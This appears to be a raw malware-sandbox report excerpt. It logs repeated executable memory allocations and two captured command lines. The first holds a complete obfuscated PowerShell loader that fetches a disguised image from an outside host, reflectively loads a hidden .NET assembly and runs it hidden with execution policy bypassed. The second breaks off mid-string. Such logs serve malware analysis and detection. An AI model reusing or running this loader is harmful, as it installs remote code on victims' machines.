stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b08000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b09000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
cmdline powershell -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu